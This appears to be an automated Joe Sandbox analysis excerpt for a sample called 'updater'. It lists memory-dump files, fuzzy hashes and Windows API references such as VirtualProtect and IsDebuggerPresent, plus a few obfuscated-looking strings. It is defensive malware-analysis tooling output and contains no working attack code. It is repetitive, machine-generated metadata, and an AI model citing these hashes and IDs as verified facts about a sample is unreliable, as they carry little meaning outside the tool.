                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindNext___std_fs_directory_iterator_advance@8
                                  • String ID:
                                  • API String ID: 3878998205-0
                                  • Opcode ID: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                  • Instruction ID: 09c6862a22427560695087e84b383205fdb6682e9555c2af192941f948e90b53
                                  • Opcode Fuzzy Hash: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
                                  • Instruction Fuzzy Hash: 53F0E2312046054BEF38AA2DDD14BBBB7ECAF90B1DF00046E9942D3051EAB0EC40C750
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?,01464064,00000000,?,0142234A,00000004,InitializeCriticalSectionEx,0144BC58,0144BC60,00000000,?,01422109,01464064,00000FA0,00000000), ref: 01422229
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID:
                                  • API String ID: 190572456-0
                                  • Opcode ID: 49ea5786ec8986e2e7c000c2203b5586f7a0ff12cdea0547497855a152d8ef3d
                                  • Instruction ID: da72b337ce7dd3c2aabba12cd1c6c2e4dc2b9291b378e02605a53abc85fc6e0c
                                  • Opcode Fuzzy Hash: 49ea5786ec8986e2e7c000c2203b5586f7a0ff12cdea0547497855a152d8ef3d
                                  • Instruction Fuzzy Hash: B8F012362052269B9F215FA9A800C5BB798EF527617540126FE14D72A0DB72D46187A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ca6fc7b75ab72121bb7e9a3007a9f71e9a0f92efbe319688626fb89780c716e2
                                  • Instruction ID: 72f302971058cf3fa610280a81b3298fd0c60248e5a0052f27d665f3f8c1c404
                                  • Opcode Fuzzy Hash: ca6fc7b75ab72121bb7e9a3007a9f71e9a0f92efbe319688626fb89780c716e2
                                  • Instruction Fuzzy Hash: DAE0E56124123257EA312A6A8C20F5B7B489FED6B1F460117DD0B922F0CBF4CA4282A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ___std_fs_copy_file@12.LIBCPMT ref: 013C315D
                                    • Part of subcall function 013C2966: __EH_prolog2.LIBCMT ref: 013C296D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prolog2___std_fs_copy_file@12
                                  • String ID:
                                  • API String ID: 1952593469-0
                                  • Opcode ID: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                  • Instruction ID: aeec3bd98d01e56af5cb5387d081e561bf52f957af32d4b58d86097fdae58106
                                  • Opcode Fuzzy Hash: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
                                  • Instruction Fuzzy Hash: A4E0683032020167C225794EAC08A57B7BEFFC2E25B14422EE81883280EF20AD10C7F5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Deallocate
                                  • String ID:
                                  • API String ID: 1075933841-0
                                  • Opcode ID: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
                                  • Instruction ID: c4689499c7a16de910dfcb99d05ea00d7553c567922758494236dc5f033f705b
                                  • Opcode Fuzzy Hash: 5b52933b155fdb532d347984173775a0226bf495b6642164c653c436c958e7f8
                                  • Instruction Fuzzy Hash: DFD05E320182018BF3345E18F0417627BE9EB00328F24094DD0D1C65D1C7A958888698
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateFileW.KERNEL32(00000000,00000000,?,0143C525,?,?,00000000), ref: 0143C152
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: dbd01ed4ab3d58b66f80e200b996e584597def36c8429a985b8604467a0dc9af
                                  • Instruction ID: 5a099ea9bd0346de79b505770fa4db0bc41f40345e595c2da128fcc31ef129e2
                                  • Opcode Fuzzy Hash: dbd01ed4ab3d58b66f80e200b996e584597def36c8429a985b8604467a0dc9af
                                  • Instruction Fuzzy Hash: 26D06C3600010DBFDF128F84DC06EDA3FAAFB48714F014000BA1856020C732E822EB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _free.LIBCMT ref: 01425653
                                    • Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
                                    • Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFreeHeapLast_free
                                  • String ID:
                                  • API String ID: 1353095263-0
                                  • Opcode ID: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
                                  • Instruction ID: 1acfd3d7756855e2e7c66491aea3fdb1eba0349e73a8c9e861a437c2a168db62
                                  • Opcode Fuzzy Hash: 8a682b33a536c5502f97d1a5cabba1255ece08263c3092e6da3b829fddb3085a
                                  • Instruction Fuzzy Hash: DBC08C31000208BBCF009B42C806A4E7BA8DB80264F200048F41017250CAB2EF009680
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNEL32(00000000), ref: 013C7BF7
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: adc76be05d4fa78dc5da78a8dd49028e9c189c6de8f251bb7df5644be8fe5ddf
                                  • Instruction ID: e63fc2d6c705d522704b3091e899e43422347bc75f5edea4de4425a6db912b20
                                  • Opcode Fuzzy Hash: adc76be05d4fa78dc5da78a8dd49028e9c189c6de8f251bb7df5644be8fe5ddf
                                  • Instruction Fuzzy Hash: D9F09835404F518FE772CB78E408792BAE1AB04B19F044A6E96B6829A0D775E896CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNEL32(000000FF), ref: 01405DA8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 63a84f46785a7dbaa568f657d4256fdeeb13005d7884a57ff24a8d0e0e5c06c7
                                  • Instruction ID: f17a9335a0e2fd4323ac1c29fc2d8e6c7e4a293d101fd523593e98d7c013ec8a
                                  • Opcode Fuzzy Hash: 63a84f46785a7dbaa568f657d4256fdeeb13005d7884a57ff24a8d0e0e5c06c7
                                  • Instruction Fuzzy Hash: DDC0123510160997A7315B5A980C5967A599F11361754C237FF6C486F0DB31C4A7C990
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                  • String ID: .$.$.$.$.$.$.$AMAB$AZAM$ZAMA$ZAMA$]YA\$]]YA$`OCK$~O]]$~\AZ
                                  • API String ID: 1208101283-2674794497
                                  • Opcode ID: 18fcc7a8b53ea705ed6c592e1fb548b176f8f6efdf615e42ca3dfcb069095c34
                                  • Instruction ID: 950c543eea491aadbec2841a2e7648a8c8cb6dbcdfa3a1a99b7bcb35ff7a027b
                                  • Opcode Fuzzy Hash: 18fcc7a8b53ea705ed6c592e1fb548b176f8f6efdf615e42ca3dfcb069095c34
                                  • Instruction Fuzzy Hash: 3502F7B2D042458FDB25EFA8E848BDEBB75AF21318F14418DE1556F2F5CB701A89CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +Inf$-Inf$Inf$NaN
                                  • API String ID: 0-4067408017
                                  • Opcode ID: af27e2793a618dbe295e5201e71b05ac0274724984e5fdfe261a97afa66b4523
                                  • Instruction ID: e5e928ea256745d7ba32c79eb6d74bd8e881806ab887934d2af447e2a9b95630
                                  • Opcode Fuzzy Hash: af27e2793a618dbe295e5201e71b05ac0274724984e5fdfe261a97afa66b4523
                                  • Instruction Fuzzy Hash: D462D331A187918ED72ACE3C845836BBFE5AFD6248F048A5EF4C997292D770C546CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %z AS %s$%z ORDER BY$%z USING PRIMARY KEY$%z VIRTUAL TABLE INDEX %d:%s$%z WITH INDEX %s$:$L$TABLE %s
                                  • API String ID: 0-162927363
                                  • Opcode ID: e8a182afad9f6da68be0c430a71da88ed5c83cf3505ca9206f79c4444088bc2c
                                  • Instruction ID: c8f2979b2536388d0f8bcc14dd7f2ada8334b8ce53fc92769973534e3f2514d5
                                  • Opcode Fuzzy Hash: e8a182afad9f6da68be0c430a71da88ed5c83cf3505ca9206f79c4444088bc2c
                                  • Instruction Fuzzy Hash: B3D248716083419FD715DF29C884A2BBBE2BFC8714F14892EF9898B3A1D771E945CB42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  • GetACP.KERNEL32(?,?,?,?,?,?,0142E6A8,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0143A9F3
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0142E6A8,?,?,?,00000055,?,-00000050,?,?), ref: 0143AA1E
                                  • _wcschr.LIBVCRUNTIME ref: 0143AAB2
                                  • _wcschr.LIBVCRUNTIME ref: 0143AAC0
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0143AB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 4147378913-905460609
                                  • Opcode ID: e677028ab7a33b91b5e813124454d1598c0a5315a651a6ad31a887b800105d48
                                  • Instruction ID: 57b69689107ebab1ded566b3fc80e59dac71303ab5b93c98271d166f1e1e7f55
                                  • Opcode Fuzzy Hash: e677028ab7a33b91b5e813124454d1598c0a5315a651a6ad31a887b800105d48
                                  • Instruction Fuzzy Hash: 31712B35680202ABEB29EF39CC45F6777A8EFAC700F24486FE685D72A1E774D5418760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: c2e85c75d567140dab1ff75d9053d424ed981bb6727c4f42d65cc2782c837426
                                  • Instruction ID: 903fe40ec0743e646a81020151b61d0d37f68a7d413ae02a056823f89b8976f7
                                  • Opcode Fuzzy Hash: c2e85c75d567140dab1ff75d9053d424ed981bb6727c4f42d65cc2782c837426
                                  • Instruction Fuzzy Hash: 71C26971E042288FDB25CE68DD807EAB7B5EB88314F5441EBD94DE7261E774AE818F40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,0143B3DC,00000002,00000000,?,?,?,0143B3DC,?,00000000), ref: 0143B157
                                  • GetLocaleInfoW.KERNEL32(?,20001004,0143B3DC,00000002,00000000,?,?,?,0143B3DC,?,00000000), ref: 0143B180
                                  • GetACP.KERNEL32(?,?,0143B3DC,?,00000000), ref: 0143B195
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: fa291738cb3a0844119d08faee19ce9a1add336aa59ddf654d2a2967f813e484
                                  • Instruction ID: 2e0ee177fcb0cb6cb2d74ddf327fa1d68d351e9ab1a257ead9c286e62ef042f5
                                  • Opcode Fuzzy Hash: fa291738cb3a0844119d08faee19ce9a1add336aa59ddf654d2a2967f813e484
                                  • Instruction Fuzzy Hash: D8218366A00105A7EF358F58C901B97B7A7EBCCAD0B568466E90AD7335E732DE42C390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 01430533
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0143B39F
                                  • IsValidCodePage.KERNEL32(00000000), ref: 0143B3E8
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0143B3F7
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0143B43F
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0143B45E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 949163717-0
                                  • Opcode ID: edd78aab57b125743fa6628f0ca5e4cb1c61dbe1bb85200c4b82f811fce9d117
                                  • Instruction ID: bc49a847fc717d5ae3b5a00b6c2f2b10fc287ead6bef30cffbdba038b38d89cf
                                  • Opcode Fuzzy Hash: edd78aab57b125743fa6628f0ca5e4cb1c61dbe1bb85200c4b82f811fce9d117
                                  • Instruction Fuzzy Hash: D3518671900216ABEB10DFA9DC44BBF77B8FFAC700F14042AEA51E7260D7709645CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 01422527
                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0142253B
                                  • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0142258B
                                  • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 014225A0
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocInfoProtectQuerySystem
                                  • String ID:
                                  • API String ID: 3562403962-0
                                  • Opcode ID: 3e90efff7494d914b568dc350143eee15e1bc6032bf4a4b38fe73e67100658aa
                                  • Instruction ID: cc114f8a305403e22798d05fd523220bac2306ad5ec486cde23471a125ded9fa
                                  • Opcode Fuzzy Hash: 3e90efff7494d914b568dc350143eee15e1bc6032bf4a4b38fe73e67100658aa
                                  • Instruction Fuzzy Hash: EA21B772E00129BBDB20DFA9CC95EEFBBB8EB44640B454026E906F7254DB709985C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                    • Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
                                    • Part of subcall function 0143049B: _free.LIBCMT ref: 01430533
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AD99
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143ADE3
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AEA9
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale$ErrorLast_free
                                  • String ID:
                                  • API String ID: 3140898709-0
                                  • Opcode ID: fcf8232a00f9d3ef5f7fb60d29ba37c0f41bbc2c3112416976fcd1a1875f4659
                                  • Instruction ID: 1453bbb726f34366e648ee28202014ac6174f96999be7fcf498e867e91c0efc6
                                  • Opcode Fuzzy Hash: fcf8232a00f9d3ef5f7fb60d29ba37c0f41bbc2c3112416976fcd1a1875f4659
                                  • Instruction Fuzzy Hash: 1861D7715801179FEB29DF28CC82B7A77A8EF98350F20417BE955C72A5E738D981CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01423475
                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0142347F
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0142348C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
